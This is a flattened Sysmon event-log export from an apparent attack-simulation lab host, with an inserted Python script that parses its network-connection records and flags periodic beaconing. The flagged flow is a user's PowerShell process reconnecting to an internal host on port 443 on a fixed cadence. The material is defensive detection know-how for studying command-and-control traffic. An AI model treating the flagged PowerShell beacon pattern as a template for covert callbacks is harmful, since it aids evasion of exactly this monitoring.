Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.144{B81B27B7-4CBD-613A-0E90-03000000C801}2788C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:46.658{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=037039EAF28C58B8FF44177AFFC4B7FB,SHA256=C369F9111CB3AC8B19CE5C2C7F288BA435C3249FFC28558F050FB6C6CDCB4DAB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035083348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:10.154{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56463-false10.0.1.12-8000- 23542300x800000000000000035083347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:46.158{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=400ADB5DDB80DF69DAC0E0776FAB82DC,SHA256=094D218D1860DEE91847E36969C1778569AAB134B63A51978CC5563B847B7AFB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:47.690{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1783A24992D58495B91BA1996F755D98,SHA256=3D2E07F69535A89CEA5DEA91B2974339209143F4E08B6E459CD31A4F1A82B8EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:48.709{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE65CDF63C267A01D8D0E71FD7C71864,SHA256=99D3BD84DF503F0E2CFBD8C99D659A1ED32AA68E129A1152068E362EB7AC6B8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
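The records above are Sysmon events from the `Microsoft-Windows-Sysmon/Operational` channel whose XML fields were flattened with no delimiter between them: each record begins with EventID, Version, Level, Task, Opcode, Keywords (`0x8000000000000000`), EventRecordID, Channel, Computer and RuleName (`-`), followed by the EventData fields in schema order. Field boundaries are still recoverable from the value shapes (timestamp, process GUID in braces, an image path ending in `.exe`, `tcp`/`udp`, `true`/`false`, dotted IPs). The example below is added here and is not part of the log export or of any Splunk or Sysmon tooling; it re-splits a run-together dump, parses the Event ID 3 (network connection) records, and scores each (image, user, destination) flow for periodicity. Two flows in this export are periodic: `powershell.exe` running as `ATTACKRANGE\REED_SCHMIDT` connecting to `10.0.1.16:443` every 5 to 6 seconds, and the forwarder's own `streamfwd.exe` sending to `10.0.1.12:8000` on a similar cadence, so the output tags flows whose image lives under the forwarder directory instead of hiding them. The `KNOWN_AGENT_DIR` prefix, the `min_conns`/`max_cv` thresholds and the assumption that EventRecordIDs never start with a zero are this example's choices, not something the page states.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Records copied from the dump above and re-joined with the single space that
# separates records in the export (constructed sample input for this example).
SAMPLE_DUMP = " ".join([
    r"354300x800000000000000035083325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:09.024{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56462-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000035083348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:10.154{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56463-false10.0.1.12-8000-",
    r"23542300x800000000000000035083347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:46.158{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=400ADB5DDB80DF69DAC0E0776FAB82DC,SHA256=094D218D1860DEE91847E36969C1778569AAB134B63A51978CC5563B847B7AFB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space",
    r"354300x800000000000000035083354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.036{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56464-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000035083356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:15.250{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56465-false10.0.1.12-8000-",
    r"354300x800000000000000035083363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:20.045{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56466-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000035083365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:20.713{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56467-false10.0.1.12-8089-",
    r"354300x800000000000000035083366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:21.028{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56468-false10.0.1.12-8000-",
    r"354300x800000000000000035083372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:25.054{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56469-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000035083374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:26.237{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56470-false10.0.1.12-8000-",
    r"354300x800000000000000035083381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:31.066{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56471-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000035083384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:32.018{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56472-false10.0.1.12-8000-",
])

# Assumption for triage only: binaries under the forwarder install directory are
# expected to talk to the Splunk server on a schedule, so they are tagged, not hidden.
KNOWN_AGENT_DIR = "c:\\program files\\splunkuniversalforwarder\\"

# Record header: EventID, Version, Level (always 4 here), Task (= EventID), Opcode (0),
# Keywords 0x8000000000000000, EventRecordID, Channel, Computer, RuleName ("-").
HEADER_RE = re.compile(
    r"(?P<eid>\d{1,2})(?P<version>\d)4(?P=eid)0"
    r"0x80+(?P<record_id>[1-9]\d*)"          # assumes record IDs never start with 0
    r"Microsoft-Windows-Sysmon/Operational"
    r"(?P<computer>[\w.-]+?)-"
    r"(?=SetValue|\d{4}-\d\d-\d\d )"          # next field: EventType (ID 13) or UtcTime
)

# EventData of Event ID 3 (NetworkConnect) in schema order; boundaries come from the
# shapes of the values, with non-greedy hostnames ending where a port number starts.
NET_RE = re.compile(r"""
    ^(?P<utc>\d{4}-\d\d-\d\d\ \d\d:\d\d:\d\d\.\d{3})
    \{(?P<guid>[0-9A-F-]+)\}
    (?P<pid>\d+)
    (?P<image>[A-Za-z]:\\.+?\.exe)
    (?P<user>[^\\]+\\\S+?)
    (?P<protocol>tcp|udp)
    (?P<initiated>true|false)(?P<src_v6>true|false)
    (?P<src_ip>[\d.]+)(?P<src_host>-|[\w.-]+?)(?P<src_port>\d{1,5})(?P<src_portname>-|[a-z]+)
    (?P<dst_v6>true|false)
    (?P<dst_ip>[\d.]+)(?P<dst_host>-|[\w.-]+?)(?P<dst_port>\d{1,5})(?P<dst_portname>-|[a-z]+)
    $""", re.VERBOSE)


def split_records(dump):
    """Yield (header dict, body string) for each record in a run-together dump."""
    heads = list(HEADER_RE.finditer(dump))
    for m, nxt in zip(heads, heads[1:] + [None]):
        end = nxt.start() if nxt else len(dump)
        header = {"event_id": int(m["eid"]), "record_id": int(m["record_id"]),
                  "computer": m["computer"]}
        yield header, dump[m.end():end].strip()


def parse_network_connections(dump):
    """Return parsed Event ID 3 records; other event types are skipped."""
    conns = []
    for header, body in split_records(dump):
        if header["event_id"] != 3:
            continue
        m = NET_RE.match(body)
        if not m:
            raise ValueError(f"unparsable Event 3 record {header['record_id']}: {body[:60]!r}")
        c = m.groupdict()
        c["utc"] = datetime.strptime(c["utc"], "%Y-%m-%d %H:%M:%S.%f")
        for k in ("pid", "src_port", "dst_port"):
            c[k] = int(c[k])
        c.update(header)
        conns.append(c)
    return conns


def find_beacons(conns, min_conns=4, max_cv=0.2):
    """Flag (image, user, destination) flows whose connection intervals are regular.

    Regularity is the coefficient of variation (population stdev / mean) of the
    gaps between consecutive connections; small values mean a fixed cadence.
    """
    by_flow = defaultdict(list)
    for c in conns:
        by_flow[(c["image"], c["user"], c["dst_ip"], c["dst_port"])].append(c["utc"])
    findings = []
    for (image, user, dst_ip, dst_port), times in by_flow.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean_gap = statistics.fmean(gaps)
        cv = statistics.pstdev(gaps) / mean_gap if mean_gap else 0.0
        if cv <= max_cv:
            findings.append({"image": image, "user": user, "dst": f"{dst_ip}:{dst_port}",
                             "count": len(times), "mean_gap_s": mean_gap, "cv": cv,
                             "known_agent": image.lower().startswith(KNOWN_AGENT_DIR)})
    return findings


if __name__ == "__main__":
    for f in find_beacons(parse_network_connections(SAMPLE_DUMP)):
        tag = "expected agent traffic" if f["known_agent"] else "REVIEW"
        print(f"{tag}: {f['user']} {f['image']} -> {f['dst']} "
              f"x{f['count']} every {f['mean_gap_s']:.1f}s (cv {f['cv']:.2f})")
```

Run as a script it prints one line per periodic flow; the `powershell.exe` flow is the one marked for review because a domain user's interactive shell has no business re-connecting to the same host on port 443 at a fixed cadence, while the `streamfwd.exe` flow is tagged as expected agent traffic. To apply it to a full export, join the records with a space exactly as they appear in the dump and pass the string to `parse_network_connections`.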
23542300x800000000000000035083353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:49.723{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A78E73179D9282B2ABA85813D14A524,SHA256=3351EFED1F87ED9EC16047C4B94B41B510B22975A49C680812DD0009121B845A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:49.039{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C80CE1E0E95AC2B6F55BDBDDCE8173BD,SHA256=15B6272914BC95E418C35D1CACDB92522FC2C5DE6372C0211366BF8649CD9FF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:50.769{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAF3D01DB58138730BDF20364BF5ECC3,SHA256=51F484FC4316587FE29075B3EC85667925262B7F9253F6C98234839260BE8FA1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:14.036{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56464-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:51.837{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3001965FC81D71D5DBA066738F41CCD1,SHA256=70A845B92A18AA54DD6C5320602D32D629FD5DBCBC8E93BA0E2AFB21FEDDA4E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:15.250{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56465-false10.0.1.12-8000- 23542300x800000000000000035083358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:52.851{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B97F96B1B2A63D428FF17386D0B4DA32,SHA256=E09F8D1C40FCC131DD349D36564DACA78704B7C3B75F0A3B269482C9EEB19C9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:53.882{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=126A32A181307C34B3D1CDE5EC3F8611,SHA256=5BC189BFB268D393FB9B1571CB2001CAC041FFB730A58DA9C36199E892929326,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:54.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24DFE90A5FBA3CCDEAF1696E4C47A180,SHA256=6F3067212B8DA55433C5A066DCED86328CBD05B799A4439788D001CB2D2C6008,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:54.702{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:55.932{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=912FE32CEAE87E0A3932881FF6849D12,SHA256=0E0A106F69AC618276748D497309047C678F80676CE7FAF94EA2E65A85A8E475,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:20.045{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56466-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:55.264{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6B1950CFAE5A0728778047C772EF251F,SHA256=1ECC9071A8AC6548C663CCC78A9BABEB671A486ACB7876CA9FB1E98BF13B4244,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:56.962{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A77EF89058A096BA1B18C85F38AD40D1,SHA256=839E273AC4B7B990090A1A82C2C661DAFF1BD5E343F150582CFB7C169A3E125F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:21.028{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56468-false10.0.1.12-8000- 354300x800000000000000035083365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:20.713{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56467-false10.0.1.12-8089- 23542300x800000000000000035083368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:57.980{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06E04FD236DDD3EA3844DEE8607ACA45,SHA256=46211165707FD07C9E852F2643B88329CF25FAB4D8ED6F15AECE591A9F0528A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:58.996{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDBAE2C8AB8F7362CD947E44E9484A9D,SHA256=369338B9A7B585E8714711600C98913D3EE2E51BBAD7E1CE360CD812B7D21783,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:25.054{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56469-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:00.095{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BAC046446374F2DD1B17DA6A52A9E831,SHA256=F2C1E3D175231C4C8201C59355FB45E5AD7465D20691F30B39FA981D843F7EFE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:00.011{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC68814541B302898B8E85490ACB5AF6,SHA256=1F8EC7733BA903FDF42AA4671A86DFE13E8B7FBB6CE8D5359A384243A8DA0869,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:26.237{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56470-false10.0.1.12-8000- 23542300x800000000000000035083373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:01.026{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=337A8F6C1910FA959409FECE59F8582D,SHA256=848E0B3FE75D21E2411E6EB91DA4EE451F8B31E9CDD344FD5DDA3ACA3E3B184F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:02.057{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=164CF0922544A689DFA4BE744F71AC78,SHA256=443B785AF56DCB501C386742479E35F423F68D2D841AE4CA394533ED0976CF15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:03.057{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B702A5AFF60EC6A68D8687E10294D29,SHA256=2379D87B85B6F881A2C885C3970DDD6B405F0F3905884A4C68B241700A606D19,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:04.072{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92F8B35EECFFA4E1D0764FAB53EF4E10,SHA256=36E69E43CD961802AF1CA475A66FBBB7326BF5C36D7D366867D778827414DCDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:05.088{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D4F9F628EAEE39EA02FB6D7B66F3147,SHA256=E18D72E53E0E4B8F53EC02202DBF2ED310438110B191AB62BF081241DD77D5F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient 
